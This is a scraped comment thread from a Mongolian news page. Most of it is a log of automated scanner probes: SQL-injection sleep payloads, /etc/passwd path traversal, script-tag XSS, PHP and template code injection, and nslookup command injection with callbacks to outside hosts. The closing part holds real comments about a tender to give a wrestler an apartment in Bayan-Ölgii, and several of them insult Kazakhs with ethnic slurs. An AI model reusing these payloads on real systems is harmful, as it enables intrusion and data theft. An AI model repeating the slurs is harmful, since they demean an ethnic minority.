GRLpGpAG [116.113.93.82<ScRiPt >jcLq(9775)</ScRiPt>] 2020-10-28 15:11:49

1

file:///etc/passwd [116.113.93.82] 2020-10-28 15:11:45

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 15:11:43

1

.. [116.113.93.82] 2020-10-28 15:11:41

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>jcLq(9492)</sCr<ScRiPt>IpT>] 2020-10-28 15:11:40

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 15:11:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:11:39

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 15:11:38

1

GRLpGpAG [116.113.93.82<script>jcLq(9349)</script>] 2020-10-28 15:11:37

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 15:11:37

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 15:11:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:11:33

1

GRLpGpAG [116.113.93.82<W1LECU>UQHQY[!+!]</W1LECU>] 2020-10-28 15:11:32

1

1O8Qo9TQ'));select pg_sleep(13); -- [116.113.93.82] 2020-10-28 15:11:29

1

RdnE0I6q');select pg_sleep(13); -- [116.113.93.82] 2020-10-28 15:11:28

1

GRLpGpAG [116.113.93.82<ScRiPt >jcLq(9914)</ScRiPt>] 2020-10-28 15:11:27

1

byptmSxv';select pg_sleep(9); -- [116.113.93.82] 2020-10-28 15:11:27

1

R9rH5ZSq'; waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 15:11:26

1

GRLpGpAG [{{9999792*9999064}}] 2020-10-28 15:11:22

1

1 waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-28 15:11:22

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ [116.113.93.82] 2020-10-28 15:11:21

1

/etc/passwd [116.113.93.82] 2020-10-28 15:11:19

1

0"XOR(if(now()=sysdate(),sleep(4),0))XOR"Z [116.113.93.82] 2020-10-28 15:11:16

1

0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z [116.113.93.82] 2020-10-28 15:11:14

1

GRLpGpAG [acux1432] 2020-10-28 15:11:14

1

if(now()=sysdate(),sleep(13),0) [116.113.93.82] 2020-10-28 15:11:11

1

-1" OR 2+442-442-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:11:09

1

-1' OR 2+494-494-1=0+0+0+1 or 'ZeojKRul'=' [116.113.93.82] 2020-10-28 15:11:08

1

-1' OR 2+717-717-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:11:05

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 15:11:04

1

-1 OR 2+214-214-1=0+0+0+1 [116.113.93.82] 2020-10-28 15:11:04

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 15:11:02

1

-1 OR 2+258-258-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 15:11:02

1

vuZZCJEu [116.113.93.82] 2020-10-28 15:11:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:11:00

1

[116.113.93.82] 2020-10-28 15:10:58

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 15:10:58

1

[116.113.93.82] 2020-10-28 15:10:57

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 15:10:55

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 15:10:52

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 15:10:50

1

<!-- [116.113.93.82] 2020-10-28 15:10:49

1

'" [116.113.93.82] 2020-10-28 15:10:48

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 15:10:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:44

WEB-INF\web.xml

JyI= [116.113.93.82] 2020-10-28 15:10:44

1

@@jF9vl [116.113.93.82] 2020-10-28 15:10:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:42

WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:41

<!--

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:39

'"

1 [116.113.93.82] 2020-10-28 15:10:39

1

\ [116.113.93.82] 2020-10-28 15:10:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:36

/WEB-INF/web.xml

1'" [116.113.93.82] 2020-10-28 15:10:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:34

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:33

uficc0gZ'));select pg_sleep(13); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:33

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:32

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:31

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:30

5rXY6gYO'));select pg_sleep(0); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:30

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:29

..

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:29

kDiO2i0T'));select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:28

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:28

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:27

@@0f9ks

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:23

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:22

\

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:21

PNsdAPza');select pg_sleep(19); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:21

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:20

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:20

YIpeySE9';select pg_sleep(19); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:19

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:19

-1));select pg_sleep(13); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:18

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:17

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:17

-1);select pg_sleep(13); --

GRLpGpAG [acu2603<s1﹥s2ʺs3ʹuca2603] 2020-10-28 15:10:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:16

-1;select pg_sleep(13); --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:15

44dQ501Y'; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:14

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:13

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:13

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:12

-1); waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.829773911] 2020-10-28 15:10:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:11

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:10

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

/www.vulnweb.com [116.113.93.82] 2020-10-28 15:10:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:09

-1; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:07

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:07

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [] 2020-10-28 15:10:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:06

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:06

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:04

0'XOR(if(now()=sysdate(),sleep(19),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:04

'"

GRLpGpAG [] 2020-10-28 15:10:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:02

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:01

if(now()=sysdate(),sleep(19),0)

GRLpGpAG [JyI=] 2020-10-28 15:10:01

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 15:10:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:10:00

-1" OR 2+310-310-1=0+0+0+1 --

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 15:10:00

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 15:10:00

1

GRLpGpAG [@@gjG6m] 2020-10-28 15:09:58

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 15:09:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:57

-1' OR 2+237-237-1=0+0+0+1 or 'Of8SPhts'='

GRLpGpAG [<!--] 2020-10-28 15:09:57

1

GRLpGpAG ['"()&%<acx><ScRiPt >jcLq(9062)</ScRiPt>] 2020-10-28 15:09:56

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 15:09:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:55

-1' OR 2+62-62-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:54

-1 OR 2+355-355-1=0+0+0+1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >jcLq(9418)</ScRiPt>] 2020-10-28 15:09:53

1

GRLpGpAG ['"] 2020-10-28 15:09:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:53

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:52

-1 OR 2+690-690-1=0+0+0+1 --

GRLpGpAG [/www.vulnweb.com] 2020-10-28 15:09:52

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 15:09:52

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 15:09:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:50

TiVyjHma

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:47

${@print(md5(acunetix_wvs_security_test))}\

create/. [116.113.93.82] 2020-10-28 15:09:46

1

create [116.113.93.82] 2020-10-28 15:09:45

1

GRLpGpAG [1] 2020-10-28 15:09:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:45

${@print(md5(acunetix_wvs_security_test))}

create [116.113.93.82] 2020-10-28 15:09:44

1

GRLpGpAG [\] 2020-10-28 15:09:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:43

";print(md5(acunetix_wvs_security_test));$a="

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 15:09:43

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 15:09:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:42

create/.

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:42

';print(md5(acunetix_wvs_security_test));$a='

!(()&&!|*|*| [116.113.93.82] 2020-10-28 15:09:42

1

GRLpGpAG [1'"] 2020-10-28 15:09:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:41

create

'"() [116.113.93.82] 2020-10-28 15:09:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:41

;print(md5(acunetix_wvs_security_test));

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 15:09:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:39

testasp.vulnweb.com/t/xss.html?%00

) [116.113.93.82] 2020-10-28 15:09:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:38

create

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:38

HttP://testasp.vulnweb.com/t/xss.html?%00

testasp.vulnweb.com [116.113.93.82] 2020-10-28 15:09:38

1

http://hitk6L9UMCzi6.bxss.me/ [116.113.93.82] 2020-10-28 15:09:38

1

Array [116.113.93.82] 2020-10-28 15:09:37

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 15:09:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:36

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:36

^(#$!@#$)(()))******

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 15:09:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:35

Array

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:34

http://hitGbti39DNlE.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:34

!(()&&!|*|*|

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 15:09:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:32

)

GRLpGpAG ['"()] 2020-10-28 15:09:32

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 15:09:31

1

GRLpGpAG [Array] 2020-10-28 15:09:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:30

testasp.vulnweb.com

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 15:09:29

1

GRLpGpAG&n914070=v963309 [116.113.93.82] 2020-10-28 15:09:29

1

GRLpGpAG [http://hitZOkt4qyq9Q.bxss.me/] 2020-10-28 15:09:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:28

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [create/.] 2020-10-28 15:09:28

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 15:09:28

1

GRLpGpAG [create] 2020-10-28 15:09:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:26

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 15:09:24

1

GRLpGpAG [create] 2020-10-28 15:09:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:24

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 15:09:24

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 15:09:23

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 15:09:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:22

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 15:09:22

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 15:09:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:21

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 15:09:20

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 15:09:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:19

1&n948171=v914679

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:18

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [)] 2020-10-28 15:09:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:17

1

GRLpGpAG [116.113.93.82&n940264=v958660] 2020-10-28 15:09:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:09:02

1

bkpWWkt2ckU= [116.113.93.82] 2020-10-28 15:09:02

1

GRLpGpAG [gwQeMdHT'));select pg_sleep(6); -- ] 2020-10-28 15:09:01

1

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 15:08:59

1

GRLpGpAG [f232PEVy');select pg_sleep(6); -- ] 2020-10-28 15:08:59

1

GRLpGpAG [9gUG2imO';select pg_sleep(6); -- ] 2020-10-28 15:08:58

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 15:08:57

1

GRLpGpAG [1zfBRnT9'; waitfor delay '0:0:6' -- ] 2020-10-28 15:08:57

1

${10000047+9999068} [116.113.93.82] 2020-10-28 15:08:56

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 15:08:56

1

GRLpGpAG [1 waitfor delay '0:0:6' -- ] 2020-10-28 15:08:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:55

${9999030+9999669}

GRLpGpAG [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 15:08:55

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 15:08:54

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 15:08:54

1

Array [116.113.93.82] 2020-10-28 15:08:53

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 15:08:53

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 15:08:53

1

&nslookup PuWumZsi&'\"`0&nslookup PuWumZsi&`' [116.113.93.82] 2020-10-28 15:08:53

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 15:08:53

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 15:08:52

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 15:08:52

1

$(nslookup mklUrV4A) [116.113.93.82] 2020-10-28 15:08:52

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 15:08:51

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 15:08:51

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 15:08:50

1

set|set&set [116.113.93.82] 2020-10-28 15:08:50

1

GRLpGpAG [..] 2020-10-28 15:08:50

1

GRLpGpAG [${9999588+9999138}] 2020-10-28 15:08:49

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 15:08:49

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 15:08:48

1

Array [116.113.93.82] 2020-10-28 15:08:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:48

&nslookup x0eAOc1e&'\"`0&nslookup x0eAOc1e&`'

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 15:08:47

1

Зочин [116.113.93.82] 2020-10-28 15:08:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:45

Array

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-28 15:08:44

1

GRLpGpAG [-1" OR 2+986-986-1=0+0+0+1 -- ] 2020-10-28 15:08:43

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 15:08:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:42

Array

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 15:08:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:40

$(nslookup 38Q2J2u7)

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 15:08:40

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 15:08:39

1

GRLpGpAG [-1' OR 2+326-326-1=0+0+0+1 or '4YJEtNGS'='] 2020-10-28 15:08:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:38

set|set&set

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:37

12345'"\'\");|]*{ <>

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:36

GRLpGpAG [/etc/passwd] 2020-10-28 15:08:36

1

GRLpGpAG [-1' OR 2+990-990-1=0+0+0+1 -- ] 2020-10-28 15:08:30

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 15:08:30

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 15:08:28

1

GRLpGpAG [&nslookup ws8w2sAM&'\"`0&nslookup ws8w2sAM&`'] 2020-10-28 15:08:28

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 15:08:27

1

GRLpGpAG [$(nslookup fbsseUyk)] 2020-10-28 15:08:26

1

GRLpGpAG [-1 OR 2+540-540-1=0+0+0+1] 2020-10-28 15:08:26

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 15:08:26

1

GRLpGpAG [-1 OR 2+123-123-1=0+0+0+1 -- ] 2020-10-28 15:08:25

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 15:08:24

1

GRLpGpAG [5n4ioBRN] 2020-10-28 15:08:24

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 15:08:23

1

GRLpGpAG [set|set&set] 2020-10-28 15:08:23

1

GRLpGpAG [Array] 2020-10-28 15:08:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:22

1

GRLpGpAG [Array] 2020-10-28 15:08:21

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 15:08:20

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 15:08:19

1

GRLpGpAG [] 2020-10-28 15:08:18

1

H58qzzQU [116.113.93.82] 2020-10-28 15:08:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:12

uOsoqBe6

"+response.write(9236433*9620316)+" [116.113.93.82] 2020-10-28 15:08:09

1

GRLpGpAG [BuinAeGC] 2020-10-28 15:08:09

1

'+response.write(9236433*9620316)+' [116.113.93.82] 2020-10-28 15:08:08

1

response.write(9236433*9620316) [116.113.93.82] 2020-10-28 15:08:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:04

"+response.write(9922857*9480644)+"

GRLpGpAG [116.113.93.82] 2020-10-28 15:08:03

'+response.write(9922857*9480644)+'

GRLpGpAG [116.113.93.82] 2020-10-28 15:07:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 15:07:49

response.write(9922857*9480644)

GRLpGpAG ["+response.write(9106284*9435777)+"] 2020-10-28 15:07:37

1

GRLpGpAG ['+response.write(9106284*9435777)+'] 2020-10-28 15:07:36

1

GRLpGpAG [response.write(9106284*9435777)] 2020-10-28 15:07:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 14:45:49

1

Зочин [103.9.90.100] 2020-10-28 11:33:03

БАЯН ӨЛГИЙН ЭРҮҮЛ МЭНД ХАЛАМЖИЙН САЛБАРЫН АВЛИГЫН АСУУДАЛ ОЛНЫ АНХААРАЛ ТАТАЖ ЭХЭЛЖ БАЙНА. ГЭТЭЛ НЭГ НАЧНЫ 2 ӨРӨӨ БАЙРАНД ТЕНДР Ч ГЭХ ШИГ ИНГЭЖ ШУДАРГА ЦАРАЙЛААД ДЭМИЙ . НААД ЖҮЖИГЭЭ БОЛЬ Л ДОО. БУСАД ТЕНДРИЙН ЛУЙВАР ХАЛАМЖИЙН САЛБАРЫН ЛУЙВАР АВЛИГА ЦЭЦЭГЛЭСЭН БАЯН ӨЛГИЙД ХУУЛЬ ГЭЖ БАЙХГҮЙ БОЛЖЭЭ. АВЛИГАД ИДЭГДСЭН ГАЗАР. АЙМГИЙН ХУУЛЬ ХЯНАЛТЫН БАЙГУУЛЛАГА ҮҮНТЭЙ ЭВЛЭРЧ УУССАН НҮД ДАДАЛ БОЛСОН ЮМ УУ,ЭСВЭЛ АЖИЛАА ХИЙДЭГГҮЙ АВЛИГАЧДАА ХАМГААЛДАГ ТЭД НАРТАЙ НИЙЛЧИХСЭН БАЙДАГ ЮМ УУ .

Зочин [202.131.243.186] 2020-10-28 08:41:00

www.tender.gov.mn-с хайж үзэв. Ийм дугаартай тендер алга. Ингэж хүмүүсийн нерв барахаа болио та нар

зочин [203.91.115.253] 2020-10-28 08:39:21

Сонирхолтой тендер. "...Мустафад 2 өрөө байр олгох" нэрнээс нь харвал гүйцэтгэгч нь ажил гүйцэтгэхгүй байр худалдах юмаа даа.

зочин [192.82.72.64] 2020-10-28 06:42:37

Хасгууд ч дэндүү даврах нь давраад байгаа юм. Халамж энэ тэр гээдЭнэ бол төрөөс хулгай л юм.

зочин [192.82.72.64] 2020-10-28 06:40:40

Мустафа сайн бөх, байр өгөх нь ч зөв.Гэхдээ төрийн мөнгөөр биш, хасгуудаасаа хандив татаж нутгийн зөвлөл зохион байгуулах хэрэгтэй.

ЗОЧИН [202.126.89.115] 2020-10-28 02:35:37

ХУЛГАЙ Ч ИЛ ЦАГААНДАА ГАРЧ ДЭЭ МОНГОЛ УЛСАД ХУУЛЬ БАЙНА УУ ХЭДЭН БӨХЧҮҮДЭЭР ТӨР БАРИУЛАХ ИЙМ АЮУЛТАЙ

ИРГЭН [202.126.90.10] 2020-10-28 02:11:14

ЭНЭ муу ХАСГУУД яаж давраад байнаа Орон нутгийн өмчийн хөрөнгөөр байр авч өгнө гэсэн чинь юу гэсэн үг вэ Өөрсдийхөө мэдлийн хэдэн хонио өгч байвал хамаа байжуу. Хойшид ХАСАГ хүнийг начин болгож болохгүй юм бна шүү. Манай бөхчүүд анхаарна биз дээ. Муу Хасгууд ингэж давраад өрөөсөө болдоггүй байхгүй юу.

Зочин [103.9.90.100] 2020-10-28 11:34:43

БАЯН ӨЛГИЙД АВЛИГА ИХЭД ЦЭЦЭГЭЛСЭН. ХУУЛЬ ХЯНАЛТЫН БАЙГУУЛЛАГА АЖИЛ АА ХИЙДЭГ ЮМ УУ .АВЛИГАЧ ХУЛГАЙ Ч НАРА А ХАМГААЛДАГ ГАЗАР ЮМ УУ

Зочин [43.242.243.186] 2020-10-27 16:07:12

Энэ хасгууд муу орманууд яаж давраад байнаа хуулиа мэддэггүй новшнууд уу НД хамаг мөнгийг ццөлж ирчихээд юу вээ чацганууд

Зочин [202.126.88.44] 2020-10-27 11:42:52

